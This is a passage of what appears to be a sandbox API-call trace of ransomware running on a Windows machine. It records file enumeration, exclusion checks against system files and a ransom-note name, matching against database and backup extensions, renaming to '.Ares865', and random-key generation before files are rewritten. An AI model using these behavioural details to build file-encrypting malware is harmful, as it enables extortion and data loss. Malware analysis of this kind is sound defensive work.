hHeap=0x2b0000) returned 1 [0092.943] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x31afc8 [0092.943] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x32afc8 [0092.943] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x31afc8 | out: hHeap=0x2b0000) returned 1 [0092.943] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x32b0e0 [0092.943] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d9d88 [0092.943] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x32b0e0 | out: hHeap=0x2b0000) returned 1 [0092.943] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d9d88 | out: hHeap=0x2b0000) returned 1 [0092.943] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x32afc8 | out: hHeap=0x2b0000) returned 1 [0092.943] UnmapViewOfFile (lpBaseAddress=0x190000) returned 1 [0092.943] CloseHandle (hObject=0x15c) returned 1 [0092.943] CloseHandle (hObject=0x118) returned 1 [0092.947] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2ef0 | out: hHeap=0x2b0000) returned 1 [0092.947] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f00d8 | out: hHeap=0x2b0000) returned 1 [0092.947] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cd0020 | out: hHeap=0x2b0000) returned 1 [0092.947] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3d6d9480, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x3d6d9480, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x3d6d9480, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0xa79, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="1aPczIMh3DXyXN37.lnk", cAlternateFileName="1APCZI~1.LNK")) returned 1 [0092.947] lstrcmpiW (lpString1="1aPczIMh3DXyXN37.lnk", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0092.947] lstrcmpiW (lpString1="1aPczIMh3DXyXN37.lnk", lpString2="aoldtz.exe") returned -1 [0092.947] lstrcmpiW (lpString1="1aPczIMh3DXyXN37.lnk", lpString2=".") returned 1 [0092.947] lstrcmpiW (lpString1="1aPczIMh3DXyXN37.lnk", lpString2="..") returned 1 [0092.947] lstrcmpiW (lpString1="1aPczIMh3DXyXN37.lnk", lpString2="windows") returned -1 [0092.947] lstrcmpiW (lpString1="1aPczIMh3DXyXN37.lnk", lpString2="bootmgr") returned -1 [0092.947] lstrcmpiW (lpString1="1aPczIMh3DXyXN37.lnk", lpString2="temp") returned -1 [0092.947] lstrcmpiW (lpString1="1aPczIMh3DXyXN37.lnk", lpString2="pagefile.sys") returned -1 [0092.947] lstrcmpiW (lpString1="1aPczIMh3DXyXN37.lnk", lpString2="boot") returned -1 [0092.947] lstrcmpiW (lpString1="1aPczIMh3DXyXN37.lnk", lpString2="ids.txt") returned -1 [0092.947] lstrcmpiW (lpString1="1aPczIMh3DXyXN37.lnk", lpString2="ntuser.dat") returned -1 [0092.947] lstrcmpiW (lpString1="1aPczIMh3DXyXN37.lnk", lpString2="perflogs") returned -1 [0092.947] lstrcmpiW (lpString1="1aPczIMh3DXyXN37.lnk", lpString2="MSBuild") returned -1 [0092.948] lstrlenW (lpString="1aPczIMh3DXyXN37.lnk") returned 20 [0092.948] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\0tvd.lnk") returned 45 [0092.948] lstrcpyW (in: lpString1=0x2cce44a, lpString2="1aPczIMh3DXyXN37.lnk" | out: lpString1="1aPczIMh3DXyXN37.lnk") returned="1aPczIMh3DXyXN37.lnk" [0092.948] lstrlenW (lpString="1aPczIMh3DXyXN37.lnk") returned 20 [0092.948] lstrlenW (lpString="Ares865") returned 7 [0092.948] lstrcmpiW (lpString1="N37.lnk", lpString2="Ares865") returned 1 [0092.948] lstrlenW (lpString=".dll") returned 4 [0092.948] lstrcmpiW (lpString1="1aPczIMh3DXyXN37.lnk", lpString2=".dll") returned 1 [0092.948] lstrlenW (lpString=".lnk") returned 4 [0092.948] lstrcmpiW (lpString1="1aPczIMh3DXyXN37.lnk", lpString2=".lnk") returned 1 [0092.948] lstrlenW (lpString=".ini") returned 4 [0092.948] lstrcmpiW (lpString1="1aPczIMh3DXyXN37.lnk", lpString2=".ini") returned 1 [0092.948] lstrlenW (lpString=".sys") returned 4 [0092.948] lstrcmpiW (lpString1="1aPczIMh3DXyXN37.lnk", lpString2=".sys") returned 1 [0092.948] lstrlenW (lpString="1aPczIMh3DXyXN37.lnk") returned 20 [0092.948] lstrlenW (lpString="bak") returned 3 [0092.948] lstrcmpiW (lpString1="lnk", lpString2="bak") returned 1 [0092.948] lstrlenW (lpString="ba_") returned 3 [0092.948] lstrcmpiW (lpString1="lnk", lpString2="ba_") returned 1 [0092.948] lstrlenW (lpString="dbb") returned 3 [0092.948] lstrcmpiW (lpString1="lnk", lpString2="dbb") returned 1 [0092.948] lstrlenW (lpString="vmdk") returned 4 [0092.948] lstrcmpiW (lpString1=".lnk", lpString2="vmdk") returned -1 [0092.948] lstrlenW (lpString="rar") returned 3 [0092.948] lstrcmpiW (lpString1="lnk", lpString2="rar") returned -1 [0092.948] lstrlenW (lpString="zip") returned 3 [0092.948] lstrcmpiW (lpString1="lnk", lpString2="zip") returned -1 [0092.948] lstrlenW (lpString="tgz") returned 3 [0092.948] lstrcmpiW (lpString1="lnk", lpString2="tgz") returned -1 [0092.948] lstrlenW (lpString="vbox") returned 4 [0092.948] lstrcmpiW (lpString1=".lnk", lpString2="vbox") returned -1 [0092.948] lstrlenW (lpString="vdi") returned 3 [0092.948] lstrcmpiW (lpString1="lnk", lpString2="vdi") returned -1 [0092.948] lstrlenW (lpString="vhd") returned 3 [0092.948] lstrcmpiW (lpString1="lnk", lpString2="vhd") returned -1 [0092.948] lstrlenW (lpString="vhdx") returned 4 [0092.948] lstrcmpiW (lpString1=".lnk", lpString2="vhdx") returned -1 [0092.949] lstrlenW (lpString="avhd") returned 4 [0092.949] lstrcmpiW (lpString1=".lnk", lpString2="avhd") returned -1 [0092.949] lstrlenW (lpString="db") returned 2 [0092.949] lstrcmpiW (lpString1="nk", lpString2="db") returned 1 [0092.949] lstrlenW (lpString="db2") returned 3 [0092.949] lstrcmpiW (lpString1="lnk", lpString2="db2") returned 1 [0092.949] lstrlenW (lpString="db3") returned 3 [0092.949] lstrcmpiW (lpString1="lnk", lpString2="db3") returned 1 [0092.949] lstrlenW (lpString="dbf") returned 3 [0092.949] lstrcmpiW (lpString1="lnk", lpString2="dbf") returned 1 [0092.949] lstrlenW (lpString="mdf") returned 3 [0092.949] lstrcmpiW (lpString1="lnk", lpString2="mdf") returned -1 [0092.949] lstrlenW (lpString="mdb") returned 3 [0092.949] lstrcmpiW (lpString1="lnk", lpString2="mdb") returned -1 [0092.949] lstrlenW (lpString="sql") returned 3 [0092.949] lstrcmpiW (lpString1="lnk", lpString2="sql") returned -1 [0092.949] lstrlenW (lpString="sqlite") returned 6 [0092.949] lstrcmpiW (lpString1="37.lnk", lpString2="sqlite") returned -1 [0092.949] lstrlenW (lpString="sqlite3") returned 7 [0092.949] lstrcmpiW (lpString1="N37.lnk", lpString2="sqlite3") returned -1 [0092.949] lstrlenW (lpString="sqlitedb") returned 8 [0092.949] lstrcmpiW (lpString1="XN37.lnk", lpString2="sqlitedb") returned 1 [0092.949] lstrlenW (lpString="xml") returned 3 [0092.949] lstrcmpiW (lpString1="lnk", lpString2="xml") returned -1 [0092.949] lstrlenW (lpString="$er") returned 3 [0092.949] lstrcmpiW (lpString1="lnk", lpString2="$er") returned 1 [0092.949] lstrlenW (lpString="4dd") returned 3 [0092.949] lstrcmpiW (lpString1="lnk", lpString2="4dd") returned 1 [0092.949] lstrlenW (lpString="4dl") returned 3 [0092.949] lstrcmpiW (lpString1="lnk", lpString2="4dl") returned 1 [0092.949] lstrlenW (lpString="^^^") returned 3 [0092.949] lstrcmpiW (lpString1="lnk", lpString2="^^^") returned 1 [0092.949] lstrlenW (lpString="abs") returned 3 [0092.949] lstrcmpiW (lpString1="lnk", lpString2="abs") returned 1 [0092.949] lstrlenW (lpString="abx") returned 3 [0092.949] lstrcmpiW (lpString1="lnk", lpString2="abx") returned 1 [0092.949] lstrlenW (lpString="accdb") returned 5 [0092.950] lstrcmpiW (lpString1="7.lnk", lpString2="accdb") returned -1 [0092.950] lstrlenW (lpString="accdc") returned 5 [0092.950] lstrcmpiW (lpString1="7.lnk", lpString2="accdc") returned -1 [0092.950] lstrlenW (lpString="accde") returned 5 [0092.950] lstrcmpiW (lpString1="7.lnk", lpString2="accde") returned -1 [0092.950] lstrlenW (lpString="accdr") returned 5 [0092.950] lstrcmpiW (lpString1="7.lnk", lpString2="accdr") returned -1 [0092.950] lstrlenW (lpString="accdt") returned 5 [0092.950] lstrcmpiW (lpString1="7.lnk", lpString2="accdt") returned -1 [0092.950] lstrlenW (lpString="accdw") returned 5 [0092.950] lstrcmpiW (lpString1="7.lnk", lpString2="accdw") returned -1 [0092.950] lstrlenW (lpString="accft") returned 5 [0092.950] lstrcmpiW (lpString1="7.lnk", lpString2="accft") returned -1 [0092.950] lstrlenW (lpString="adb") returned 3 [0092.950] lstrcmpiW (lpString1="lnk", lpString2="adb") returned 1 [0092.950] lstrlenW (lpString="adb") returned 3 [0092.950] lstrcmpiW (lpString1="lnk", lpString2="adb") returned 1 [0092.950] lstrlenW (lpString="ade") returned 3 [0092.950] lstrcmpiW (lpString1="lnk", lpString2="ade") returned 1 [0092.950] lstrlenW (lpString="adf") returned 3 [0092.950] lstrcmpiW (lpString1="lnk", lpString2="adf") returned 1 [0092.950] lstrlenW (lpString="adn") returned 3 [0092.950] lstrcmpiW (lpString1="lnk", lpString2="adn") returned 1 [0092.950] lstrlenW (lpString="adp") returned 3 [0092.950] lstrcmpiW (lpString1="lnk", lpString2="adp") returned 1 [0092.950] lstrlenW (lpString="alf") returned 3 [0092.950] lstrcmpiW (lpString1="lnk", lpString2="alf") returned 1 [0092.950] lstrlenW (lpString="ask") returned 3 [0092.950] lstrcmpiW (lpString1="lnk", lpString2="ask") returned 1 [0092.950] lstrlenW (lpString="btr") returned 3 [0092.950] lstrcmpiW (lpString1="lnk", lpString2="btr") returned 1 [0092.950] lstrlenW (lpString="cat") returned 3 [0092.950] lstrcmpiW (lpString1="lnk", lpString2="cat") returned 1 [0092.950] lstrlenW (lpString="cdb") returned 3 [0092.950] lstrcmpiW (lpString1="lnk", lpString2="cdb") returned 1 [0092.950] lstrlenW (lpString="ckp") returned 3 [0092.951] lstrcmpiW (lpString1="lnk", lpString2="ckp") returned 1 [0092.951] lstrlenW (lpString="cma") returned 3 [0092.951] lstrcmpiW (lpString1="lnk", lpString2="cma") returned 1 [0092.951] lstrlenW (lpString="cpd") returned 3 [0092.951] lstrcmpiW (lpString1="lnk", lpString2="cpd") returned 1 [0092.951] lstrlenW (lpString="dacpac") returned 6 [0092.951] lstrcmpiW (lpString1="37.lnk", lpString2="dacpac") returned -1 [0092.951] lstrlenW (lpString="dad") returned 3 [0092.951] lstrcmpiW (lpString1="lnk", lpString2="dad") returned 1 [0092.951] lstrlenW (lpString="dadiagrams") returned 10 [0092.951] lstrcmpiW (lpString1="XyXN37.lnk", lpString2="dadiagrams") returned 1 [0092.951] lstrlenW (lpString="daschema") returned 8 [0092.951] lstrcmpiW (lpString1="XN37.lnk", lpString2="daschema") returned 1 [0092.951] lstrlenW (lpString="db-journal") returned 10 [0092.951] lstrcmpiW (lpString1="XyXN37.lnk", lpString2="db-journal") returned 1 [0092.951] lstrlenW (lpString="db-shm") returned 6 [0092.951] lstrcmpiW (lpString1="37.lnk", lpString2="db-shm") returned -1 [0092.951] lstrlenW (lpString="db-wal") returned 6 [0092.951] lstrcmpiW (lpString1="37.lnk", lpString2="db-wal") returned -1 [0092.951] lstrlenW (lpString="dbc") returned 3 [0092.951] lstrcmpiW (lpString1="lnk", lpString2="dbc") returned 1 [0092.951] lstrlenW (lpString="dbs") returned 3 [0092.951] lstrcmpiW (lpString1="lnk", lpString2="dbs") returned 1 [0092.951] lstrlenW (lpString="dbt") returned 3 [0092.951] lstrcmpiW (lpString1="lnk", lpString2="dbt") returned 1 [0092.951] lstrlenW (lpString="dbv") returned 3 [0092.951] lstrcmpiW (lpString1="lnk", lpString2="dbv") returned 1 [0092.951] lstrlenW (lpString="dbx") returned 3 [0092.951] lstrcmpiW (lpString1="lnk", lpString2="dbx") returned 1 [0092.951] lstrlenW (lpString="dcb") returned 3 [0092.951] lstrcmpiW (lpString1="lnk", lpString2="dcb") returned 1 [0092.952] lstrcmpiW (lpString1="lnk", lpString2="dct") returned 1 [0092.952] lstrcmpiW (lpString1="lnk", lpString2="dcx") returned 1 [0092.952] lstrcmpiW (lpString1="lnk", lpString2="ddl") returned 1 [0092.952] lstrcmpiW (lpString1=".lnk", lpString2="dlis") returned -1 [0092.952] lstrcmpiW (lpString1="lnk", lpString2="dp1") returned 1 [0092.952] lstrcmpiW (lpString1="lnk", lpString2="dqy") returned 1 [0092.952] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\1aPczIMh3DXyXN37.lnk.Ares865") returned 65 [0092.952] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\1aPczIMh3DXyXN37.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\recent\\1apczimh3dxyxn37.lnk"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\1aPczIMh3DXyXN37.lnk.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\recent\\1apczimh3dxyxn37.lnk.ares865"), dwFlags=0x1) returned 1 [0092.953] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\1aPczIMh3DXyXN37.lnk.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\recent\\1apczimh3dxyxn37.lnk.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0092.954] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=2681) returned 1 [0092.954] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0092.954] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2ef0 [0092.954] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0092.954] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0092.955] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0092.955] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0092.955] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0xd80, lpName=0x0) returned 0x15c [0092.955] MapViewOfFile (hFileMappingObject=0x15c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xd80) returned 0x190000 [0092.956] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0092.956] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0092.956] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0092.956] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2f68 [0092.956] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2f68 | out: hHeap=0x2b0000) returned 1 [0092.956] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x31afc8 [0092.957] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x32afc8 [0092.957] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x31afc8 | out: hHeap=0x2b0000) returned 1 [0092.957] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x32b0e0 [0092.957] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d9938 [0092.958] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x32b0e0 | out: hHeap=0x2b0000) returned 1 [0092.958] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d9938 | out: hHeap=0x2b0000) returned 1 [0092.958] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x32afc8 | out: hHeap=0x2b0000) returned 1 [0092.958] UnmapViewOfFile (lpBaseAddress=0x190000) returned 1 [0092.958] CloseHandle (hObject=0x15c) returned 1 [0092.959] CloseHandle (hObject=0x118) returned 1 [0092.960] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2ef0 | out: hHeap=0x2b0000) returned 1 [0092.960] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f00d8 | out: hHeap=0x2b0000) returned 1 [0092.960] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cd0020 | out: hHeap=0x2b0000) returned 1 [0092.960] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3d3b97a0, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x3d3b97a0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x3d3b97a0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x3d5, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="1ddGr.lnk", cAlternateFileName="")) returned 1 [0092.960] lstrcmpiW (lpString1="1ddGr.lnk", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0092.960] lstrcmpiW (lpString1="1ddGr.lnk", lpString2="aoldtz.exe") returned -1 [0092.960] lstrcmpiW (lpString1="1ddGr.lnk", lpString2=".") returned 1 [0092.960] lstrcmpiW (lpString1="1ddGr.lnk", lpString2="..") returned 1 [0092.960] lstrcmpiW (lpString1="1ddGr.lnk", lpString2="windows") returned -1 [0092.960] lstrcmpiW (lpString1="1ddGr.lnk", lpString2="bootmgr") returned -1 [0092.960] lstrcmpiW (lpString1="1ddGr.lnk", lpString2="temp") returned -1 [0092.960] lstrcmpiW (lpString1="1ddGr.lnk", lpString2="pagefile.sys") returned -1 [0092.960] lstrcmpiW (lpString1="1ddGr.lnk", lpString2="boot") returned -1 [0092.960] lstrcmpiW (lpString1="1ddGr.lnk", lpString2="ids.txt") returned -1 [0092.960] lstrcmpiW (lpString1="1ddGr.lnk", lpString2="ntuser.dat") returned -1 [0092.960] lstrcmpiW (lpString1="1ddGr.lnk", lpString2="perflogs") returned -1 [0092.960] lstrcmpiW (lpString1="1ddGr.lnk", lpString2="MSBuild") returned -1 [0092.960] lstrlenW (lpString="1ddGr.lnk") returned 9 [0092.960] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\1aPczIMh3DXyXN37.lnk") returned 57 [0092.960] lstrcpyW (in: lpString1=0x2cce44a, lpString2="1ddGr.lnk" | out: lpString1="1ddGr.lnk") returned="1ddGr.lnk" [0092.961] lstrlenW (lpString="1ddGr.lnk") returned 9 [0092.961] lstrlenW (lpString="Ares865") returned 7 [0092.961] lstrcmpiW (lpString1="dGr.lnk", lpString2="Ares865") returned 1 [0092.961] lstrlenW (lpString=".dll") returned 4 [0092.961] lstrcmpiW (lpString1="1ddGr.lnk", lpString2=".dll") returned 1 [0092.961] lstrlenW (lpString=".lnk") returned 4 [0092.961] lstrcmpiW (lpString1="1ddGr.lnk", lpString2=".lnk") returned 1 [0092.961] lstrlenW (lpString=".ini") returned 4 [0092.961] lstrcmpiW (lpString1="1ddGr.lnk", lpString2=".ini") returned 1 [0092.961] lstrlenW (lpString=".sys") returned 4 [0092.961] lstrcmpiW (lpString1="1ddGr.lnk", lpString2=".sys") returned 1 [0092.961] lstrlenW (lpString="1ddGr.lnk") returned 9 [0092.961] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\1ddGr.lnk.Ares865") returned 54 [0092.961] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\1ddGr.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\recent\\1ddgr.lnk"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\1ddGr.lnk.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\recent\\1ddgr.lnk.ares865"), dwFlags=0x1) returned 1 [0092.962] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\1ddGr.lnk.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\recent\\1ddgr.lnk.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0092.962] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=981) returned 1 [0092.962] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0092.963] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2ef0 [0092.963] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0092.963] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0092.963] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0092.963] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0092.964] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x6e0, lpName=0x0) returned 0x15c [0092.964] MapViewOfFile (hFileMappingObject=0x15c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x6e0) returned 0x190000 [0092.964] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0092.965] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0092.965] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0092.965] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2f68 [0092.965] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2f68 | out: hHeap=0x2b0000) returned 1 [0092.965] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x31afc8 [0092.965] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x32afc8 [0092.965] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x31afc8 | out: hHeap=0x2b0000) returned 1 [0092.965] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x32b0e0 [0092.965] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d9d88 [0092.965] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x32b0e0 | out: hHeap=0x2b0000) returned 1 [0092.965] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d9d88 | out: hHeap=0x2b0000) returned 1 [0092.965] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x32afc8 | out: hHeap=0x2b0000) returned 1 [0092.965] UnmapViewOfFile (lpBaseAddress=0x190000) returned 1 [0092.965] CloseHandle (hObject=0x15c) returned 1 [0092.965] CloseHandle (hObject=0x118) returned 1 [0092.966] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2ef0 | out: hHeap=0x2b0000) returned 1 [0092.967] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f00d8 | out: hHeap=0x2b0000) returned 1 [0092.967] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cd0020 | out: hHeap=0x2b0000) returned 1 [0092.967] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3e0d10a0, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x3e0d10a0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x3e0d10a0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0xf28, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="1n55sxKLdAdwKRUxf.mkv.lnk", cAlternateFileName="1N55SX~1.LNK")) returned 1 [0092.967] lstrcmpiW (lpString1="1n55sxKLdAdwKRUxf.mkv.lnk", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0092.967] lstrcmpiW (lpString1="1n55sxKLdAdwKRUxf.mkv.lnk", lpString2="aoldtz.exe") returned -1 [0092.967] lstrcmpiW (lpString1="1n55sxKLdAdwKRUxf.mkv.lnk", lpString2=".") returned 1 [0092.967] lstrcmpiW (lpString1="1n55sxKLdAdwKRUxf.mkv.lnk", lpString2="..") returned 1 [0092.967] lstrcmpiW (lpString1="1n55sxKLdAdwKRUxf.mkv.lnk", lpString2="windows") returned -1 [0092.967] lstrcmpiW (lpString1="1n55sxKLdAdwKRUxf.mkv.lnk", lpString2="bootmgr") returned -1 [0092.967] lstrcmpiW (lpString1="1n55sxKLdAdwKRUxf.mkv.lnk", lpString2="temp") returned -1 [0092.967] lstrcmpiW (lpString1="1n55sxKLdAdwKRUxf.mkv.lnk", lpString2="pagefile.sys") returned -1 [0092.967] lstrcmpiW (lpString1="1n55sxKLdAdwKRUxf.mkv.lnk", lpString2="boot") returned -1 [0092.967] lstrcmpiW (lpString1="1n55sxKLdAdwKRUxf.mkv.lnk", lpString2="ids.txt") returned -1 [0092.967] lstrcmpiW (lpString1="1n55sxKLdAdwKRUxf.mkv.lnk", lpString2="ntuser.dat") returned -1 [0092.967] lstrcmpiW (lpString1="1n55sxKLdAdwKRUxf.mkv.lnk", lpString2="perflogs") returned -1 [0092.967] lstrcmpiW (lpString1="1n55sxKLdAdwKRUxf.mkv.lnk", lpString2="MSBuild") returned -1 [0092.967] lstrlenW (lpString="1n55sxKLdAdwKRUxf.mkv.lnk") returned 25 [0092.967] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\1ddGr.lnk") returned 46 [0092.967] lstrcpyW (in: lpString1=0x2cce44a, lpString2="1n55sxKLdAdwKRUxf.mkv.lnk" | out: lpString1="1n55sxKLdAdwKRUxf.mkv.lnk") returned="1n55sxKLdAdwKRUxf.mkv.lnk" [0092.967] lstrlenW (lpString="1n55sxKLdAdwKRUxf.mkv.lnk") returned 25 [0092.967] lstrlenW (lpString="Ares865") returned 7 [0092.967] lstrcmpiW (lpString1="mkv.lnk", lpString2="Ares865") returned 1 [0092.967] lstrlenW (lpString=".dll") returned 4 [0092.967] lstrcmpiW (lpString1="1n55sxKLdAdwKRUxf.mkv.lnk", lpString2=".dll") returned 1 [0092.967] lstrlenW (lpString=".lnk") returned 4 [0092.967] lstrcmpiW (lpString1="1n55sxKLdAdwKRUxf.mkv.lnk", lpString2=".lnk") returned 1 [0092.967] lstrlenW (lpString=".ini") returned 4 [0092.967] lstrcmpiW (lpString1="1n55sxKLdAdwKRUxf.mkv.lnk", lpString2=".ini") returned 1 [0092.967] lstrlenW (lpString=".sys") returned 4 [0092.967] lstrcmpiW (lpString1="1n55sxKLdAdwKRUxf.mkv.lnk", lpString2=".sys") returned 1 [0092.968] lstrlenW (lpString="1n55sxKLdAdwKRUxf.mkv.lnk") returned 